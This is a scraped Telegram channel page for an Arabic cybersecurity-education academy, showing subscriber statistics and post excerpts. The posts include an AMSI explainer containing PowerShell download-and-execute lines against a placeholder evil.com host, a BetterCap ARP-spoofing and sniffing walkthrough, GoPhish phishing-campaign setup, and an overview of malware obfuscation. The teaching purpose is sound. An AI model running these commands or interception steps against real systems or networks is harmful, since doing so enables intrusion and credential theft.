en
Feedback
🛡️الدرع الأخضر | GREEN ARMOR🛡️

🛡️الدرع الأخضر | GREEN ARMOR🛡️

Open in Telegram

‏نهدف إلى نشر مفهوم ‎الأمن السيبراني لمجتمع واعٍ وأمن إلكترونياً🛡💻 #تعليمي جروب المناقشة: t.me/GREENARMOR_group لمراسلة الأدمن ولطلب خدمة: t.me/GREENARMOR_ADMIN المجتمع: https://t.me/addlist/fIFdDFSe7wU5MjEy للأكاديمية : https://greenarmor.academy

Show more
No data
Subscribers
+624 hours
+277 days
+16630 days
Attracting Subscribers
December '25
December '25
+79
in 2 channels
November '25
+716
in 1 channels
Get PRO
October '25
+2 125
in 12 channels
Get PRO
September '25
+129
in 0 channels
Get PRO
August '25
+490
in 0 channels
Get PRO
July '25
+802
in 0 channels
Get PRO
June '25
+749
in 1 channels
Get PRO
May '25
+695
in 1 channels
Get PRO
April '25
+408
in 0 channels
Get PRO
March '25
+670
in 4 channels
Get PRO
February '25
+900
in 3 channels
Get PRO
January '25
+569
in 2 channels
Get PRO
December '24
+519
in 4 channels
Get PRO
November '24
+875
in 3 channels
Get PRO
October '24
+1 804
in 4 channels
Get PRO
September '24
+1 877
in 3 channels
Get PRO
August '24
+1 614
in 3 channels
Get PRO
July '24
+1 594
in 5 channels
Get PRO
June '24
+1 114
in 2 channels
Get PRO
May '24
+1 333
in 2 channels
Get PRO
April '24
+970
in 2 channels
Get PRO
March '24
+1 133
in 6 channels
Get PRO
February '24
+763
in 5 channels
Get PRO
January '24
+361
in 0 channels
Get PRO
December '23
+252
in 0 channels
Get PRO
November '23
+396
in 3 channels
Get PRO
October '23
+453
in 2 channels
Get PRO
September '23
+1 313
in 0 channels
Get PRO
August '23
+933
in 0 channels
Get PRO
July '23
+818
in 0 channels
Get PRO
June '23
+1 178
in 0 channels
Get PRO
May '23
+573
in 0 channels
Get PRO
April '23
+653
in 0 channels
Get PRO
March '23
+565
in 0 channels
Get PRO
February '23
+726
in 0 channels
Get PRO
January '23
+579
in 0 channels
Get PRO
December '22
+1 577
in 0 channels
Get PRO
November '22
+4 377
in 0 channels
Date
Subscriber Growth
Mentions
Channels
09 December+1
08 December+8
07 December+5
06 December+16
05 December+4
04 December+10
03 December+9
02 December+21
01 December+5
Channel Posts
📶🔜 قــــريـــــبـــــًا | Coming Soon 🔜📶
📶🔜 قــــريـــــبـــــًا | Coming Soon 🔜📶

2
🛡 مبادرة أكاديمية الدرع الأخضر لأهل غزة 🇵🇸.. إيمانًا منا بأن العلم سلاح، والأمل حق تعلن أكاديمية الدرع الأخضر | GREEN ARMO
🛡 مبادرة أكاديمية الدرع الأخضر لأهل غزة 🇵🇸.. إيمانًا منا بأن العلم سلاح، والأمل حق تعلن أكاديمية الدرع الأخضر | GREEN ARMOR ACADEMY عن تقديم دورة: 🎓 Security+ SYO-701 🎁 مجـانًا بالكامـل لأهـلنـا فـي غـــزة دعمًا لصمودهم، واستثمارًا في مستقبلهم، نفتح لهم باب دخول عالم الأمن السيبراني بقوة، ليكون العلم طريقهم للثبات. 🛡 رابط الدورة من هنـــــــا .. ✉️ للتسجيل: http://t.me/GREENARMOR_ADMIN ✌️ عاشت فلسطين حرة… 🎓 العلم رسالة، والموقف واجب #GreenArmorAcademy #غزة #فلسطين #الأمن_السيبراني #SecurityPlus #مجاناً
0
3
🛡 مبادرة أكاديمية الدرع الأخضر لأهل غزة 🇵🇸.. إيمانًا منا بأن العلم سلاح، والأمل حق تعلن أكاديمية الدرع الأخضر | GREEN ARMO
🛡 مبادرة أكاديمية الدرع الأخضر لأهل غزة 🇵🇸.. إيمانًا منا بأن العلم سلاح، والأمل حق تعلن أكاديمية الدرع الأخضر | GREEN ARMOR ACADEMY عن تقديم دورة: 🎓 Security+ SYO-701 🎁 مجـانًا بالكامـل لأهـلنـا فـي غـــزة دعمًا لصمودهم، واستثمارًا في مستقبلهم، نفتح لهم باب دخول عالم الأمن السيبراني بقوة، ليكون العلم طريقهم للثبات. 🛡 رابط الدورة من هنـــــــا .. ✉️ للتسجيل: http://t.me/GREENARMOR_ADMIN ✌️ عاشت فلسطين حرة… 🎓 العلم رسالة، والموقف واجب #GreenArmorAcademy #غزة #فلسطين #الأمن_السيبراني #SecurityPlus
0
4
🛡 الـ AMSI من الداخل: كيف يفكّر نظام الحماية قبل أن تفكّر أنت كـ Red Teamer 🧑‍💻 .. 🎁 مسابقة في النهاية 🎁 🔎 ما هو AMSI ب
🛡 الـ AMSI من الداخل: كيف يفكّر نظام الحماية قبل أن تفكّر أنت كـ Red Teamer 🧑‍💻 .. 🎁 مسابقة في النهاية 🎁 🔎 ما هو AMSI ببساطة؟ تخيل أنك تكتب أمر في PowerShell لتنفيذ مهمة معينة، قبل أن ينفذ هذا الأمر، هناك "حارس أمني" يفحص ما كتبت ويقرر، هل هذا آمن أم خطير؟ هذا الحارس اسمه ⏺AMSI (Anti-Malware Scan Interface) ✔️الـ AMSI ببساطة هو جسر يربط بين: ⏺البرامج التي تشغل الأكواد (مثل PowerShell). ⏺برامج الحماية (مثل Windows Defender). فكر فيه كنقطة تفتيش في المطار: كل شيء يمر عبرها قبل أن يُسمح له بالمرور. 🤔 لماذا تم إنشاء AMSI؟ في السابق، برامج الحماية كانت تفحص الملفات فقط، إذا حملت ملف exe على الجهاز، تفحصه الحماية وتقرر. لكن المشكلة: ماذا لو أنت لا تكتب ملف أصلاً؟ ماذا لو تشغل الكود مباشرة من الذاكرة؟ 💥مثال: IEX (New-Object Net.WebClient).DownloadString('http://evil.com/hack.ps1') ✅ هذا الأمر: 📌لا يكتب أي ملف على القرص. 📌يحمل الكود مباشرة في الذاكرة. 📌وينفذه فوراً. ✔️النتيجة؟ برامج الحماية القديمة لا ترى شيئاً! لهذا السبب ظهر AMSI ليفحص الأكواد أثناء التنفيذ وليس فقط على القرص. ⚙️ كيف يعمل AMSI؟ الموضوع بسيط جداً: 1️⃣أنت تكتب أمر في PowerShell مثلاً: Get-Process 2️⃣قبل التنفيذ، PowerShell يوقف قليلاً ويقول لـ AMSI: "عندي هذا الأمر، ممكن تفحصه؟" 3️⃣الـ AMSI ياخذ الأمر ويعطيه لبرنامج الحماية، مثل Windows Defender أو أي برنامج حماية آخر 4️⃣برنامج الحماية يفحص ويقرر: 🟢إذا كان آمن ✔️  يقول لـ PowerShell: "تفضل نفذه" ⏺إذا كان خطير ❌  يقول: "لا، امنعه!" 5️⃣الـ PowerShell ينفذ القرار إما يكمل التنفيذ أو يوقف كل شيء. 💥 ببساطة: AMSI هو الوسيط الذي ينقل الكود من التطبيق إلى برنامج الحماية. 🔍ماذا يفحص AMSI بالضبط؟ الـ AMSI لا يبحث فقط عن "كلمات خطيرة"، بل يفحص أشياء كثيرة: 1️⃣النص الذي كتبته: إذا كتبت Invoke-Mimikatz مثلاً، AMSI يرى هذا الاسم ويعرف أنه أداة مشهورة لسرقة كلمات السر. 2️⃣السلوك المتوقع: حتى لو غيرت الأسماء، AMSI يسأل: "ماذا سيفعل هذا الكود؟" 🟢هل سيحاول الوصول لملفات حساسة؟ 🟢هل سيحمل ملف من الإنترنت وينفذه؟ 🟢هل سيحاول تعطيل الحماية؟ 3️⃣الأنماط المعروفة: حتى لو كتبت الكود بطريقة مختلفة، إذا كان النمط مشابه لهجوم معروف، سيكتشفه، مثال بسيط لكود مشبوه: $url = "http://evil.com/payload.exe" Invoke-WebRequest $url -OutFile file.exe Start-Process file.exe 🟢تحميل ملف من الإنترنت. 🟢حفظه على الجهاز. 🟢تشغيله مباشرة. السلوك واضح: هجوم! 👩‍💻التشفير لا ينفع! كثير من المبتدئين يفكرون: "لو شفرت الكود بـ Base64، هل أخدع AMSI؟" الجواب: لا! لأن PowerShell يفك التشفير أولاً قبل ما يرسل الكود لـ AMSI. 💥مثال: powershell -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA ⏺الـ AMSI لن يرى الكود المشفر، بل سيرى بعد فك التشفير: Invoke-Mimikatz ⏺وطبعاً سيكتشفه فوراً! 🛡علاقة AMSI بأنظمة EDR: إذا كنت مبتدئ، ربما تسأل، ما هو EDR؟ EDR = Endpoint Detection and Response هي أنظمة حماية متقدمة تراقب كل شيء يحصل على الجهاز وتربط الأحداث ببعضها. الـ AMSI هو عين EDR داخل البرامج. ✅يعني: AMSI يشوف الأكواد التي تكتبها و يرسلها لـ EDR بعدها الـ EDR يسجل كل شيء ويحلل السلوك إذا شاهد نمط هجوم، يتحرك فوراً مثال على الربط: 1️⃣فتحت Word. 2️⃣الـ Word فتح PowerShell (مشبوه!). 3️⃣الـ PowerShell حمل ملف من النت. 4️⃣حاول الوصول لكلمات السر الـ EDR يشوف هذا التسلسل كاملاً ويقول، هذا هجوم واضح!. ❌ أخطاء شائعة عند المبتدئين.. 1️⃣"إذا تجاوزت AMSI، أنا بأمان" لا! AMSI طبقة وحدة فقط، هناك طبقات أخرى كثيرة: ⏺الـ Event Logs (السجلات). ⏺الـ ETW (تتبع الأحداث). ⏺مراقبة الشبكة. ⏺فحص الذاكرة. حتى لو عطلت AMSI، باقي الطبقات تشتغل! 2️⃣"تعديل الكلمات يكفي" كثير يغيرون الأسماء: بدل: Invoke-Mimikatz يتم كتابتها: Inv0ke-Mim1k@tz ✅المشكلة: السلوك نفسه! أنت قمت بتغير الاسم، لكن الكود ما زال يسرق كلمات سر. 3️⃣الـ "AMSI يبحث عن كلمات محددة فقط" لا، AMSI أذكى من ذلك، يحلل السلوك الكامل، وليس فقط الكلمات. 🤓اختبر فهمك لـ AMSI واربح الجوائز! 🎁 ✔️عند تشغيل هذا الكود مع تفعيل AMSI ❓ $enc = "SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA" $dec = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($enc)) Invoke-Expression $dec ✔️ ماذا سيحدث تحديداً؟ 1️⃣الكود سينفذ بنجاح. 2️⃣خطأ في الصيغة. 3️⃣اكتشاف ومنع من AMSI. 4️⃣تنفيذ متأخر. 🎁الجائزة: هدية مقدمة من أكاديمية الدرع الأخضر + فاوتشر TryHackMe🎁 ⚡️سيتم اختيار اجابة صحيحة من الاجابات الصحيحة بعد ٤٨ ساعة، بالتوفيق لكم💚 ⏺اجب في التعليقات 👇
0
5
🛡 مبتدئ في الأمن السيبراني❓.. ❌ لا تبدأ بتعلم الاختراق. ✅ ابدأ بتعلم الشبكات. 🟢إذا كنت جديدًا في مجال الأمن السيبراني، وأول
🛡 مبتدئ في الأمن السيبراني❓.. ❌ لا تبدأ بتعلم الاختراق. ✅ ابدأ بتعلم الشبكات. 🟢إذا كنت جديدًا في مجال الأمن السيبراني، وأول ما يخطر ببالك "أريد أتعلم اختراق" فهذا طبيعي جدًا. 🟢لكن الحقيقة التي يتجاوزها كثير من المبتدئين هي أن البداية الصحيحة ليست من الاختراق، بل من الشبكات. 🌎 كل هجوم يتم عبر شبكة. 🛡 كل دفاع يعتمد على فهم الشبكة. 🛠 كل أداة أمن سيبراني مبنية على هذا الأساس. 📶الشبكات ببساطة تعني: ⏺كيف يتصل جهاز بجهاز؟ ⏺كيف يصل الإنترنت لهاتفك؟ ⏺كيف يُفتح الموقع؟ ⏺كيف تنتقل البيانات ثم يعود لك الرد؟ 💥 باختصار: الشبكات هي الطريق الذي تسير فيه المعلومة. 🟢 إذا بدأت في الاختراق بدون أساس قوي في الشبكات: ⚠️ ستواجه أدوات لا تعمل. ⚠️ ستحتار في الأخطاء. ⚠️ ستتأخر في التعلّم. ✔️لكن عندما تُتقن الشبكات: ✅ تفهم لماذا المنفذ مغلق. ✅ لماذا الاتصال فشل. ✅ أين الخلل بالضبط. ✅ وتتحول من "تشغيل أدوات" إلى محلل أمني حقيقي. 📚 ابدأ بتعلّم أساسيات بسيطة لكن قوية: ⏺ما هو IP؟ ⏺ما هو Port؟ ⏺الفرق بين TCP vs UDP؟ ⏺كيف يعمل DNS؟ ⏺كيف يصل الطلب من جهازك إلى السيرفر؟ ⏺ما هو الجدار الناري؟ ⏺ما هو VPN؟ ✔️هذه ليست معلومات نظرية مملة، بل هي المفتاح الحقيقي لفهم عالم الأمن السيبراني. 🎓 من ناحية الدورات والشهادات، ابدأ بدورات تمهيدية مثل: ⏺Networking Fundamentals ⏺Networking Basics ✔️ثم انتقل إلى شهادات أقوى مثل: ⏺ CCNA ⏺ Network+ هذه الشهادات تبني لديك فهمًا عمليًا حقيقيًا وليس حفظًا فقط. 🛣 الترتيب الصحيح لك كمبتدئ بإختصار: 1️⃣شبكات 2️⃣ لينكس 3️⃣ برمجة "bash,python" 4️⃣ أساسيات الأمن 5️⃣ ثم الاختراق. 🔥 الخلاصة: من يتجاوز الشبكات، يتعب طويلًا ومن يتقنها… يسبق الجميع 🏆 ‏🎓اشترك الان في الدورات الإحترافية على أكاديمية الدرع الأخضر من هنـــــــا🎓
0
6
📹 شاهد: ⚡️تقنيات الوصول المتقدم داخل الشبكات: ⚡️Pivoting, Tunneling & Port Forwarding⚡️ ✅ هذه المحاضرة تركز على شرح المفاهيم
📹 شاهد: ⚡️تقنيات الوصول المتقدم داخل الشبكات: ⚡️Pivoting, Tunneling & Port Forwarding⚡️ ✅ هذه المحاضرة تركز على شرح المفاهيم الأساسية التي يقوم عليها التنقّل داخل الشبكات بعد الاختراق الأولي، وتوضّح الفكرة الصحيحة لكل تقنية ومتى يتم استخدامها في بيئة اختبار الاختراق. 🛡تتعرف في هذه المحاضرة على: 🔴 مفهوم Pivoting ولماذا يُستخدم. 🔴 فكرة Tunneling وكيف يعمل نفق الاتصال. 🔴 معنى Port Forwarding ودوره في الوصول للخدمات الداخلية. ⚔️  الشرح ضمن دورة CPTS  على اكاديمية الدرع الأخضر⚔️ ✔️ مناسبة للمبتدئين وكل من يريد فهم الأساس قبل التطبيق العملي. 🌟 مشاهدة المحاضرة كاملة من هنـــــــا 🌟
0
7
+1
شرح_أداة_Bettercap_في_الأمن_السيبراني_.pdf
0
8
🛡 شرح أداة BetterCap مع مثال عملي 😑 .. ✅ما هي BetterCap؟ اداة BetterCap هي أداة قوية تُستخدم لاختبار الاختراق ومراقبة الشبك
🛡 شرح أداة BetterCap مع مثال عملي 😑 .. ✅ما هي BetterCap؟ اداة BetterCap هي أداة قوية تُستخدم لاختبار الاختراق ومراقبة الشبكات السلكية واللاسلكية والبلوتوث BLE، تُعد البديل المطوّر لأدوات مثل ettercap و arpspoof، وتتفوق عليها بفضل سرعتها وكفاءتها كونها مكتوبة بلغة Go. ✅ الاستخدام الأساسي: تنفيذ هجمات الرجل في المنتصف (MITM) لاعتراض وتحليل حركة المرور داخل الشبكة. 🛠 تثبيت BetterCap على كالي لينكس في الغالب تأتي مثبتة مسبقًا، وإن لم تكن موجودة: sudo apt update && sudo apt install bettercap 💥 أهم (Modules) BetterCap: 1️⃣ net.probe اكتشاف الأجهزة المتصلة بالشبكة تلقائيًا. 2️⃣ net.recon الاستماع لحركة المرور وتحليل الخدمات النشطة. 3️⃣ arp.spoof تنفيذ هجوم ARP Spoofing (MITM). 4️⃣ any.proxy إنشاء بروكسي لاعتراض وتحليل حركة المرور. 5️⃣ Caplets سكربتات جاهزة لأتمتة المهام. 🔥 مثال لتنفيذ هجوم ARP Spoofing: ⚠️ استخدم هذا فقط على شبكتك الخاصة ولأغراض تعليمية، أي استخدام آخر غير قانوني. 1️⃣ تشغيل BetterCap: افتح التيرمنال واكتب: sudo bettercap -iface eth0 استبدل eth0 بـ wlan0 إذا كنت تستخدم واي فاي ⏺لمعرفة الواجهة: ip a ⏺ستدخل الآن إلى واجهة BetterCap التفاعلية. 2️⃣ اكتشاف الأجهزة في الشبكة: داخل واجهة BetterCap: net.probe on ⏺انتظر قليلًا… ثم اعرض الأجهزة: net.show ✔️ستظهر قائمة تحتوي على: 🟢 عنوان الراوتر (Gateway). 🟢 الأجهزة المتصلة (الضحية). 3️⃣ تفعيل هجوم ARP Spoofing: استبدل IP الضحية بعنوان الجهاز المستهدف: set arp.spoof.targets 192.168.1.10 set arp.spoof.fullduplex true arp.spoof on ✅ النتيجة: أصبحت الآن "الرجل في المنتصف" وجميع الاتصالات تمر عبر جهازك. 4️⃣ تشغيل Sniffer لمراقبة الحركة: net.sniff on ⏺ستبدأ البيانات (DNS — HTTP — إلخ) بالظهور أمامك مباشرة. 5️⃣ إيقاف وتنظيف كل شيء: net.sniff off arp.spoof off net.probe off quit ⚠️مهم جدًا ! إيقاف arp.spoof يعيد جداول ARP لطبيعتها في الشبكة. 💡 استخدام Caplets (الأبسط للمبتدئين): ⏺يمكنك تشغيل كابليت جاهز مثل hstshijack: sudo bettercap -iface eth0 -caplet hstshijack/hstshijack ⏺يقوم الكابليت بأتمتة الهجمات وجعل الاتصالات غير الآمنة تبقى غير آمنة. ⚠️ لا تستخدم BetterCap على أي شبكة لا تملكها، أي استخدام بدون إذن يعرضك للمساءلة القانونية. 📝 هذا تقرير كامل يشرح اداة bettercap  بالغة العربية | English Language 📝 ‏🎓اشترك الان في الدورات الإحترافية على أكاديمية الدرع الأخضر من هنـــــــا🎓
0
9
+1
Malware_Obfuscation_Report_Inside_Mechanisms_to_Frustrate_Static.pdf
0
10
🛡 الـ Inside Malware Obfuscation، التقنيات التي تعطل التحليل الثابت والديناميكي” 🦠.. يعتبر Obfuscation من أقوى الأدوات التي
🛡 الـ Inside Malware Obfuscation، التقنيات التي تعطل التحليل الثابت والديناميكي” 🦠.. يعتبر Obfuscation من أقوى الأدوات التي يعتمد عليها مطوّرو المالوير لعرقلة التحليل الثابت، والتحليل الديناميكي، والهندسة العكسية، هدفه ليس منع التحليل بالكامل، بل رفع التكلفة الزمنية والتحليلية إلى حد يجعل اكتشاف السلوك الحقيقي صعبًا أو متأخرًا. 1️⃣ الـ Packing / Encryption التمويه عبر التغليف والتشفير:  🟢كيف يعمل من الداخل؟ يتم وضع الـ payload الحقيقي داخل طبقة compressed أو encrypted. 🟢عند التنفيذ، يقوم الـ unpacker / decryptor الذي يكون صغير جدًا باستخراج الـ payload داخل الذاكرة (memory only). 🟢لا يتم كتابة الكود المفكوك على القرص، مما يضرب التحليل الثابت تمامًا. ✅ تقنيات متقدمة يستخدمها المالوير: ⏺يستخدم Multi-layer packing (3–7 طبقات فك) ⏺ يستخدم Custom packers بدل UPX ⏺ الـ On-the-fly decryption: فك دوال معينة فقط عند الحاجة ⚠️ لماذا هو خطير؟ لأن الـ signature-based detection يصبح عديم الفائدة، والـ payload الحقيقي لا يُرى إلا داخل الذاكرة. 🟢 كيف يتعامل المحللون معه؟ الـ Memory dumping + reconstruction.  الـ API hooking لاعتراض الدوال بعد فك التشفير. الـ Emulation (مثل Capstone + Unicorn Engine). 2️⃣ الـ Polymorphic Malware تعديل البصمة مع كل إصابة: 🟢 كيف يعمل؟ يستخدم الـ malware encryptor بمفتاح متغير في كل مرة. 🟢 يتم تشفير الكود نفسه لكن باستخدام مفتاح مختلف، ينتج ملف مختلف تمامًا لكنه يقوم بنفس الوظيفة. 🛠 أدوات شائعة: 📌Mutation engines 📌Custom XOR + polymorphic decryptor ⚠️ لماذا يعتبر خطرًا؟ لأن كل نسخة لها hash مختلف، و signature detection يصبح 0% فعال. 💣 كاشفوه يعتمدون على: ⏺تحليل تسلسل API. ⏺الـ Network behavior. ⏺الـ Memory artifacts. ⏺الـ Feature engineering من البايتات. 3️⃣ الـ Metamorphic Malware، إعادة كتابة الكود بالكامل: هذا الأخطر بين كل تقنيات التمويه. 🟢 كيف يعمل؟ يقوم المحرك metamorphic engine بإعادة ترتيب وبناء الكود عند كل نسخة: 🟢إعادة ترتيب الدوال، وتغيير التدفق البنيوي، وإعادة كتابة البلوكات، واستبدال التعليمات بمرادفات (instruction substitution). 🟢تغيير الإزاحات (Offsets). ✅ النتيجة: لا يوجد كود ثابت يمكن مقارنته! لكن السلوك (behavior) يبقى نفسه. 4️⃣ الـControl Flow Flattening (CFF)، تسطيح التدفق: 🟢 الفكرة: تقسيم الدوال إلى Blocks كثيرة، ثم استخدام Dispatcher يقرر أي Block سيُنفّذ، بهذا يصبح التدفق الحقيقي غير واضح: ⏺يتشوه CFG. ⏺تتعقد أدوات تنفيذ الهندسة العكسية (IDA, Ghidra). 💥 مؤشرات CFF: ⏺الـBlocks صغيرة جدًا. ⏺الـswitch-case ضخم. ⏺الـ Dispatcher central loop. ✅ كيف يتعامل المحللون معه؟ ⏺CFG recovery. ⏺Advanced deobfuscation scripts. ⏺Symbolic execution. ⏺Emulation-based unfolding. 5️⃣ الـ Junk Code Injection، حقن كود غير مفيد: 🟢فكرة بسيطة لكن فعالة: إضافة NOPs تعليمات رياضية غير مستخدمة ومتغيرات لا قيمة لها. ✅ الهدف:  تضليل Disassemblers، Feature extractors، Byte-level ML models. 💥 الإزالة تتم عبر: ⏺Dead code analysis ⏺Data-flow analysis ⏺Intermediate Representation (IR) مثل LLVM IR 6️⃣ الـ API Obfuscation، إخفاء الدوال الحقيقية: 🔥أحد أهم أسلحة المالوير الحديث. 🟢كيف يعمل؟ عدم استيراد API مباشرة من IAT. 🟢 استخدام الـ Dynamic Function Resolution: 📌 يقوم المالوير بالبحث عن functions داخل DLL في وقت التشغيل. 📌 الـ Hashing API names بدل كتابتها نصًا 📌 الـ Indirect syscalls للتهرب من EDR 📌 الـ API trampolines 📌الـ Resolver routines تعتمد على PEB ،  Ldr Modules. ⚠️ لماذا خطير؟ لأن static analysis لا يظهر أي دالة Windows API واضحة، والسلوك يُكتشف فقط عند التنفيذ. 🔥الجزء الأهم، كيف يفك الذكاء الاصطناعي هذا التمويه؟ 1️⃣Graph Neural Networks (GNN): تحليل الـ CFG والـ Call Graph و Import Graph رغم التمويه. 2️⃣Dynamic Behavior Modeling: تتبع الـ Syscalls وسلاسل استدعاءات API وشجرة العمليات. 3️⃣Hybrid Detection Models: دمج الميزات الثابتة (Static Features) مع السلوكية والذاكرة. 4️⃣Embedding Representations: تحويل الـ Bytes والـ Opcodes والدوال إلى تمثيلات رقمية. 🎯 النتيجة: كشف شبه كامل للمالوير المموّه عبر التركيز على البنية والسلوك بدلاً من الشكل الخارجي. 💥 تقنيات التمويه الحديثة لا تهدف فقط إلى تغيير شكل الكود، بل إعادة هندسة طريقة اكتشاف المالوير بالكامل، ولهذا أصبح من الضروري استخدام: ✔️Behavioral ML ✔️Memory analysis ✔️Binary instrumentation ✔️Hybrid static/dynamic pipelines ✔️Automated deobfuscation frameworks ‏🎓اشتراك الان في الدورات الإحترافية على أكاديمية الدرع الأخضر من هنـــا🎓
0
11
⏳ تبقى 24 ساعة للخصم ⏳ 🛍خصم 30% على جميع دورات الأمن السيراني🛍 ✅ CPTS | CRTP | ECPPTV3 | Bug Bounty | EWPT | SECURITY+ | eC
⏳ تبقى 24 ساعة للخصم ⏳ 🛍خصم 30% على جميع دورات الأمن السيراني🛍 ✅ CPTS | CRTP | ECPPTV3 | Bug Bounty | EWPT | SECURITY+ | eCIR 🎯 سجل الآن: www.greenarmor.academy ✉️ للإستفسار: @GREENARMOR_ADMIN
0
12
+1
التصيد_الاحتيالي_وأداة_GoPhish_GREENARMOR.pdf
0
13
🛡 ما هي أداة GoPhish ؟ 🎣 🔥 منصة احترافية لمحاكاة هجمات التصيّد في العمليات السيبرانية. ✅تعتبر 90% من الهجمات السيبرانية مع
🛡 ما هي أداة GoPhish ؟ 🎣 🔥 منصة احترافية لمحاكاة هجمات التصيّد في العمليات السيبرانية. ✅تعتبر 90% من الهجمات السيبرانية معتمدة على الهندسة الاجتماعية، تصبح أدوات محاكاة التصيّد جزءا أساسيا من أي برنامج أمني متكامل. وأبرز هذه الأدوات وأكثرها استخدامًا في عمليات Red Team و Blue Team هي أداة Gophish. ✅ اداة Gophish هي أداة مفتوحة المصدر تُستخدم لإنشاء حملات تصيّد واقعية بهدف اكتشاف نقاط الضعف البشرية، واختبار قدرات الدفاع والاستجابة داخل المؤسسات. تسمح الأداة بإرسال رسائل احتيالية مقنعة، وإنشاء صفحات تسجيل دخول مزيفة، وتتبع تفاعل المستخدمين لحظة بلحظة. 🎯 مميزات Gophish: ✔️ واجهة استخدام بسيطة: لوحة تحكم واضحة لتنفيذ حملات كاملة خلال دقائق. ✔️ قوالب جاهزة: لرسائل البريد، صفحات تسجيل الدخول، وتقارير التفاعل. ✔️ تتبّع دقيق: من فتح البريد، من ضغط الرابط، من أدخل بياناته. ✔️ قوية للـ Red Team: تمنح قدرة كاملة لمحاكاة سيناريوهات تصيّد حقيقية. ✔️ مفيدة للـ Blue Team: تُمكّن من تحليل الاستجابات الدفاعية وتحسين الوعي الأمني. 🛠 طريقة تثبيت وتشغيل Gophish على كالي لينكس: 1️⃣ تحميل الأداة من GitHub: wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip 2️⃣ فك الضغط: unzip gophish-v0.12.1-linux-64bit.zip cd gophish 3️⃣ تشغيل الأداة: sudo ./gophish 💥بعد التشغيل: ✅ لوحة التحكم: https://127.0.0.1:3333 البريد الافتراضي لتسجيل الدخول يظهر في الترمينال بعد الإقلاع. 4️⃣ بعد الدخول، يمكنك: ⏺إنشاء حملة جديدة. ⏺تصميم صفحة تسجيل دخول. ⏺إعداد بريد الإرسال. ⏺رفع قائمة الموظفين. ⏺تشغيل الحملة ومراقبتها. 🔥 مثال عملي شامل (Red Team + Blue Team): 📌 سيناريو: اختبار تصيّد لموظفي شركة باستخدام Gophish: 🔴 الـ Red Team تنفيذ الهجمة: يقوم الفريق بإنشاء حملة تصيّد لتقييم الموظفين: 1️⃣ بريد احتيالي مقنع العنوان: ⚠️ تنبيه مهم: سيتم إيقاف حساب Microsoft 365 خلال 24 ساعة 2️⃣ زر "تسجيل الدخول" مزيف: يؤدي إلى صفحة شبيهة بواجهة Microsoft 365 تم تصميمها في Gophish. 3️⃣ رفع قائمة الموظفين: ملف CSV يحتوي الاسم، البريد، القسم. 4️⃣ تشغيل الحملة ورصد النتائج. ⏺ 60 فتحوا الرسالة ⏺ 25 ضغطوا على الرابط ⏺ 4 أدخلوا بياناتهم (معدل خطر مرتفع) 🔵 الـ Blue Team التحليل والكشف: بعد وصول الرسالة، يبدأ الفريق الدفاعي بتحليل ما إذا تم رصد الهجمة: ✅ فحص البريد: ⏺نطاق الرابط غير تابع للشركة: SPF/DKIM فاشل ⏺عنوان بريد غير موثوق. ✅ تحليل سجلات SIEM: ⏺محاولات تسجيل دخول غريبة. ⏺طلبات HTTP POST مشبوهة. ⏺نشاط غير معتاد من أجهزة الموظفين. ✅ الاستجابة Incident Response: ⏺إعادة تعيين كلمات المرور. ⏺إرسال تحذير داخلي. ⏺تحديث فلترة البريد. ⏺ تدريب الموظفين الذين وقعوا في الهجمة. ✔️ تعتبر اداة GoPhish ليست مجرد أداة للتصيّد، بل منصّة متكاملة تساعد المؤسسات على محاكاة أخطر الهجمات الواقعية التي يقوم بها المهاجمون، سهولتها وفعاليتها جعلتها الخيار الأول للعديد من الباحثين الأمنيين وفرق Red Team حول العالم. 🔤 ما زالت الخصومات على الدورات الاحترافية قي اكاديمية الدرع الأخضر مستمرة وتبقى 48 ساعة على انتهاءها اغتنم الفرصة وسجل الأن من هنــــــا 🔤
0
14
⏰ باقي 3 أيام فقط! خصم 30٪ على جميع دورات الأمن السيبراني في أكاديمية الدرع الأخضر! ⌛️ 🔥 دوراتنا الاحترافية: CPTS | CRTP | S
⏰ باقي 3 أيام فقط! خصم 30٪ على جميع دورات الأمن السيبراني في أكاديمية الدرع الأخضر! ⌛️ 🔥 دوراتنا الاحترافية: CPTS | CRTP | Security+ | eCPPTv3 | eCIR | Bug Bounty | eWPT 💥 اغتنم الفرصة الآن وابدأ تطوير مهاراتك السيبرانية فورًا! 🌐 سجّل قبل انتهاء العرض: www.greenarmor.academy 💬 للاستفسار: t.me/GREENARMOR_ADMIN ⚡️ الوقت محدود… استعد للارتقاء بمستواك السيبراني 🧑‍💻
0
15
🟥 تعاني شركة "Cloudflare" حاليًا من انقطاع واسع النطاق أثر على خدماتها الأساسية، مما تسبب في تعطل عدد كبير من المواقع والتطبيقات حول العالم. ⏺الإنقطاع مستمر من 3 ساعات تقريبًا الى هذه اللحظة. ✔️ تابع التفاصيل: https://www.cloudflarestatus.com/
0
16
🟥 تعاني شركة "Cloudflare" حاليًا من انقطاع واسع النطاق أثر على خدماتها الأساسية، مما تسبب في تعطل عدد كبير من المواقع والتطبيقات حول العالم. ⏺الإنقطاع مستمر من 3 ساعات تقريبًا الى هذه اللحظة. ✔️ تابع التفاصيل: https://www.cloudflarestatus.com/
0
17
🔥حصري🔥 🛍 خصم 30% على جميع دورات الأمن السيبراني الإحترافية في أكاديمية الدرع الأخضر ! 🛍 CPTS | CRTP | +SECURITY | ECPPTv3
🔥حصري🔥 🛍 خصم 30% على جميع دورات الأمن السيبراني الإحترافية في أكاديمية الدرع الأخضر ! 🛍 CPTS | CRTP | +SECURITY | ECPPTv3 | ECIR | Bug Bounty | EWPT 💥 اغتنم الفرصة الذهبية لتطوير مهاراتك السيبرانية 😒 🛍 عرض 4 أيام فقط لا تفوت التوفير! 🚀 ⏺سجل الآن: www.greenarmor.academy ⏺للإستفسار: t.me/GREENARMOR_ADMIN
0
18
🛍🤔🏷
0
19
+1
Expert_Report_on_Blacklist3r_Tool_In_Depth_Technical_Analysis_for.pdf
0
20
🛡 ما هي اداة Blacklist3r وما هي المشكلة الأساسية التي تحلها ؟ 🌎.. ✅ تخيل أن لديك منزلًا (موقع ويب) ومفتاح هذا المنزل (Machi
